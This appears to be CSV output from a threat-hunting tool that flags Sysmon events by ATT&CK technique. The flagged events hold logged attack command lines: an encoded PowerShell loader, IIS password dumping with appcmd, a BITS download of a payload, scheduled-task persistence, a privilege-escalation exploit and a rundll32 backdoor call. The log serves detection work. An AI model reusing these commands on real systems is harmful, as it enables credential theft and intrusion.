11.00.17763.1 (WinBuild.160101.0800)
Microsoft (R) HTML Application host
Internet Explorer
Microsoft Corporation
MSHTA.EXE
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Public\memViewData.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-1231-610F-0000-002057A80700
0x7a857
1
Medium
SHA1=EE1ED6AEA892E2ABCFA64D9D51078EFDFAEA6253,MD5=4DBAFC3C0B7A9CAA67D6C2C3D99422F2,SHA256=12C94C614FB752DC1F6797B5FB3AD67719E3C924FACDA35DC36792C8E5AC45FC,IMPHASH=4CB8A74361E70A5FF774A0A1A7C65989
747F3D96-1239-610F-0000-0010D0210A00
600
C:\Windows\explorer.exe
C:\Windows\Explorer.EXE
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1170] Detecting Mshta,1628379181.118316,2021-08-08T03:33:01.118316+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) Trying to run mshta with Command Line ("C:\Windows\SysWOW64\mshta.exe" "C:\Users\Public\memViewData.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}) and Parent Image :C:\Windows\explorer.exe , Parent CommandLine (C:\Windows\Explorer.EXE) in directory : ( C:\Windows\system32\ )",1,"
1
5
4
1
0
0x8000000000000000
556720
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2021-08-07 23:33:01.091
747F3D96-182D-610F-0000-00106F40D300
9932
C:\Windows\SysWOW64\mshta.exe
11.00.17763.1 (WinBuild.160101.0800)
Microsoft (R) HTML Application host
Internet Explorer
Microsoft Corporation
MSHTA.EXE
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Public\memViewData.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-1231-610F-0000-002057A80700
0x7a857
1
Medium
SHA1=EE1ED6AEA892E2ABCFA64D9D51078EFDFAEA6253,MD5=4DBAFC3C0B7A9CAA67D6C2C3D99422F2,SHA256=12C94C614FB752DC1F6797B5FB3AD67719E3C924FACDA35DC36792C8E5AC45FC,IMPHASH=4CB8A74361E70A5FF774A0A1A7C65989
747F3D96-1239-610F-0000-0010D0210A00
600
C:\Windows\explorer.exe
C:\Windows\Explorer.EXE
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558920559.473868,2019-05-27T05:29:19.473868+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list vdir /text:password ),1,"
1
5
4
1
0
0x8000000000000000
5961
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-27 01:29:19.433
365ABB72-3D6F-5CEB-0000-00100FC7FF00
2168
C:\Windows\System32\inetsrv\appcmd.exe
7.5.7600.16385 (win7_rtm.090713-1255)
Application Server Command Line Admin Tool
Internet Information Services
Microsoft Corporation
"C:\Windows\System32\inetsrv\appcmd.exe" list vdir /text:password
C:\Windows\Temp\
IIS APPPOOL\DefaultAppPool
365ABB72-B26B-5CEA-0000-002023240800
0x82423
0
High
SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45
365ABB72-3D4A-5CEB-0000-0010FA93FD00
2584
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc 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
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1082] System Information Discovery,1589069393.260757,2020-05-10T04:09:53.260757+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) with commandline ( whoami) ,1,"
1
5
4
1
0
0x8000000000000000
112972
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-05-10 00:09:43.370
747F3D96-4647-5EB7-0000-0010B3454B01
7672
C:\Windows\System32\whoami.exe
10.0.17763.1 (WinBuild.160101.0800)
whoami - displays logged on user information
Microsoft® Windows® Operating System
Microsoft Corporation
whoami.exe
whoami
c:\Users\IEUser\Tools\PrivEsc\
NT AUTHORITY\SYSTEM
747F3D96-3B92-5EB5-0000-0020E7030000
0x3e7
1
System
SHA1=47D7864D26FC67E0D60391CBF170D33DA518C322,MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88
747F3D96-4640-5EB7-0000-0010EF364B01
372
C:\Windows\System32\cmd.exe
c:\Windows\System32\cmd.exe
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558920559.403767,2019-05-27T05:29:19.403767+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list vdir /text:userName ),1,"
1
5
4
1
0
0x8000000000000000
5958
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-27 01:29:19.353
365ABB72-3D6F-5CEB-0000-00104FC3FF00
2484
C:\Windows\System32\inetsrv\appcmd.exe
7.5.7600.16385 (win7_rtm.090713-1255)
Application Server Command Line Admin Tool
Internet Information Services
Microsoft Corporation
"C:\Windows\System32\inetsrv\appcmd.exe" list vdir /text:userName
C:\Windows\Temp\
IIS APPPOOL\DefaultAppPool
365ABB72-B26B-5CEA-0000-002023240800
0x82423
0
High
SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45
365ABB72-3D4A-5CEB-0000-0010FA93FD00
2584
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABl
AD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564913815.299641,2019-08-04T14:16:55.299641+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.exe ),1,"
1
5
4
1
0
0x8000000000000000
5951
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-08-04 10:16:50.403
747F3D96-B092-5D46-0000-001089041204
7792
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
C:\Windows\system32\cmd.exe
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-56A3-5D45-0000-0020B3D31800
0x18d3b3
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-B091-5D46-0000-001081F71104
820
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe" /c start C:\Windows\system32\cmd.exe
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1603490256.411768,2020-10-24T01:57:36.411768+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\cmd.exe ) through command line ( "C:\Windows\System32\cmd.exe" /C schtasks /Create /f /XML C:\Users\IEUser\AppData\Local\Temp\sduchxll.tmp /TN DataUsageHandlers ),1,"
1
5
4
1
0
0x8000000000000000
424076
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-10-23 21:57:36.394
747F3D96-51D0-5F93-0000-0010B2B35B00
5572
C:\Windows\SysWOW64\cmd.exe
10.0.17763.592 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
Cmd.Exe
"C:\Windows\System32\cmd.exe" /C schtasks /Create /f /XML C:\Users\IEUser\AppData\Local\Temp\sduchxll.tmp /TN DataUsageHandlers
C:\Users\IEUser\AppData\Local\Temp\tmp1375\
MSEDGEWIN10\IEUser
747F3D96-4690-5F93-0000-002085A50800
0x8a585
1
High
SHA1=E2EAD0993B917E1828A658ADA0B87E01D5B8424F,MD5=C43699F84A68608E7E57C43B7761BBB8,SHA256=2EDB180274A51C83DDF8414D99E90315A9047B18C51DFD070326214D4DA59651,IMPHASH=392B4D61B1D1DADC1F06444DF258188A
747F3D96-51D0-5F93-0000-001036A15B00
3396
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" conf3234.dll f8753 d948
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
Prohibited Process connecting to internet,1595802375.141778,2020-07-27T02:26:15.141778+04:00,,Threat,Critical,"User (MSEDGEWIN10\IEUser) run process C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe and initiated network connection from hostname ( MSEDGEWIN10 and IP ( 127.0.0.1 ) to hostname ( MSEDGEWIN10 ) , IP ( 127.0.0.1 ) and port ( 445 )",3,"
3
5
4
3
0
0x8000000000000000
339223
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-07-26 22:13:19.375
747F3D96-FF9D-5F1D-0000-00100AC62400
7400
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
MSEDGEWIN10\IEUser
tcp
true
false
127.0.0.1
MSEDGEWIN10
49796
false
127.0.0.1
MSEDGEWIN10
445
microsoft-ds
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558920559.323652,2019-05-27T05:29:19.323652+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list vdir "Filename: redirection.config" /text:password ),1,"
1
5
4
1
0
0x8000000000000000
5955
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-27 01:29:19.283
365ABB72-3D6F-5CEB-0000-00108FBFFF00
168
C:\Windows\System32\inetsrv\appcmd.exe
7.5.7600.16385 (win7_rtm.090713-1255)
Application Server Command Line Admin Tool
Internet Information Services
Microsoft Corporation
"C:\Windows\System32\inetsrv\appcmd.exe" list vdir "Filename: redirection.config" /text:password
C:\Windows\Temp\
IIS APPPOOL\DefaultAppPool
365ABB72-B26B-5CEA-0000-002023240800
0x82423
0
High
SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45
365ABB72-3D4A-5CEB-0000-0010FA93FD00
2584
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc 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
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[ T1086 ] Powershell with Suspicious Argument,1564435984.008882,2019-07-30T01:33:04.008882+04:00,,Threat,Critical,"Found User (MSEDGEWIN10\IEUser) run Suspicious PowerShell commands that include ( -c ,-Destination ,-Destination,powershell,reg,Start-BitsTransfer,.txt, -c ,-Destination ,-Destination,powershell,reg,Start-BitsTransfer,.txt) in event with Command Line (powershell -c "Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1) and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine (cmd /c powershell -c "Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1) in directory : ( C:\Windows\system32\ )",1,"
1
5
4
1
0
0x8000000000000000
4895
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-29 21:33:03.695
747F3D96-660F-5D3F-0000-00106B508600
6720
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows PowerShell
Microsoft® Windows® Operating System
Microsoft Corporation
powershell -c "Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-6053-5D3F-0000-002082314100
0x413182
1
High
SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F
747F3D96-660F-5D3F-0000-001055378600
2948
C:\Windows\System32\cmd.exe
cmd /c powershell -c "Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1197] BITS Jobs - Process,1564435984.008882,2019-07-30T01:33:04.008882+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( powershell -c "Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1 ),1,"
1
5
4
1
0
0x8000000000000000
4895
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-29 21:33:03.695
747F3D96-660F-5D3F-0000-00106B508600
6720
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows PowerShell
Microsoft® Windows® Operating System
Microsoft Corporation
powershell -c "Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-6053-5D3F-0000-002082314100
0x413182
1
High
SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F
747F3D96-660F-5D3F-0000-001055378600
2948
C:\Windows\System32\cmd.exe
cmd /c powershell -c "Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "c:\Windows\System32\cmd.exe" ),1,"
1
5
4
1
0
0x8000000000000000
112815
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-05-07 13:13:02.476
747F3D96-095E-5EB4-0000-0010D46F1800
5216
C:\Windows\System32\cmd.exe
10.0.17763.592 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
Cmd.Exe
"c:\Windows\System32\cmd.exe"
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-08F7-5EB4-0000-0020BAEC0200
0x2ecba
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-095E-5EB4-0000-001002511800
6396
C:\Windows\System32\changepk.exe
"C:\Windows\system32\ChangePk.exe"
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1086] PowerShell Process found,1564435984.008882,2019-07-30T01:33:04.008882+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( powershell -c "Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1 ),1,"
1
5
4
1
0
0x8000000000000000
4895
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-29 21:33:03.695
747F3D96-660F-5D3F-0000-00106B508600
6720
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows PowerShell
Microsoft® Windows® Operating System
Microsoft Corporation
powershell -c "Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-6053-5D3F-0000-002082314100
0x413182
1
High
SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F
747F3D96-660F-5D3F-0000-001055378600
2948
C:\Windows\System32\cmd.exe
cmd /c powershell -c "Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564913810.45591,2019-08-04T14:16:50.455910+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c start C:\Windows\system32\cmd.exe ),1,"
1
5
4
1
0
0x8000000000000000
5950
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-08-04 10:16:49.960
747F3D96-B091-5D46-0000-001081F71104
820
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c start C:\Windows\system32\cmd.exe
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-56A3-5D45-0000-0020B3D31800
0x18d3b3
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-B080-5D46-0000-0010D4EA0F04
2112
C:\Windows\System32\WSReset.exe
"C:\Windows\system32\WSReset.exe"
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1595802375.141764,2020-07-27T02:26:15.141764+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd ),1,"
1
5
4
1
0
0x8000000000000000
339222
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-07-26 22:26:14.521
747F3D96-0306-5F1E-0000-0010E15F3100
3660
C:\Windows\System32\cmd.exe
10.0.17763.592 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
Cmd.Exe
cmd
C:\Windows\system32\
NT AUTHORITY\SYSTEM
747F3D96-F938-5F1D-0000-0020E7030000
0x3e7
1
System
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-F938-5F1D-0000-00104B500000
584
C:\Windows\System32\winlogon.exe
winlogon.exe
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558920560.555423,2019-05-27T05:29:20.555423+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list vdir ". )" /text:password ),1,"
1
5
4
1
0
0x8000000000000000
5991
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-27 01:29:20.475
365ABB72-3D70-5CEB-0000-0010F2EDFF00
4012
C:\Windows\System32\inetsrv\appcmd.exe
7.5.7600.16385 (win7_rtm.090713-1255)
Application Server Command Line Admin Tool
Internet Information Services
Microsoft Corporation
"C:\Windows\System32\inetsrv\appcmd.exe" list vdir ". )" /text:password
C:\Windows\Temp\
IIS APPPOOL\DefaultAppPool
365ABB72-B26B-5CEA-0000-002023240800
0x82423
0
High
SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45
365ABB72-3D4A-5CEB-0000-0010FA93FD00
2584
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc 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
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564834103.555174,2019-08-03T16:08:23.555174+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1,"
1
5
4
1
0
0x8000000000000000
5452
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-08-03 12:08:23.391
747F3D96-7937-5D45-0000-00100D290801
4192
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe"
C:\Windows\system32\
NT AUTHORITY\SYSTEM
747F3D96-D4E9-5D45-0000-0020E7030000
0x3e7
1
System
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-7934-5D45-0000-0010CAB90701
7564
C:\Windows\System32\consent.exe
consent.exe 896 272 00000280644BC500
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1589069378.023663,2020-05-10T04:09:38.023663+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( c:\Windows\System32\cmd.exe ),1,"
1
5
4
1
0
0x8000000000000000
112969
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-05-10 00:09:36.703
747F3D96-4640-5EB7-0000-0010EF364B01
372
C:\Windows\System32\cmd.exe
10.0.17763.592 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
Cmd.Exe
c:\Windows\System32\cmd.exe
c:\Users\IEUser\Tools\PrivEsc\
NT AUTHORITY\SYSTEM
747F3D96-3B92-5EB5-0000-0020E7030000
0x3e7
1
System
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-4640-5EB7-0000-0010292D4B01
8028
C:\Users\IEUser\Tools\PrivEsc\NetworkServiceExploit.exe
NetworkServiceExploit.exe -i -c "c:\Windows\System32\cmd.exe"
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1584766817.998461,2020-03-21T09:00:17.998461+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1,"
1
5
4
1
0
0x8000000000000000
243516
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-03-21 05:00:17.518
747F3D96-9F61-5E75-0000-00109B6C1E00
6620
C:\Windows\System32\rundll32.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
RUNDLL32.EXE
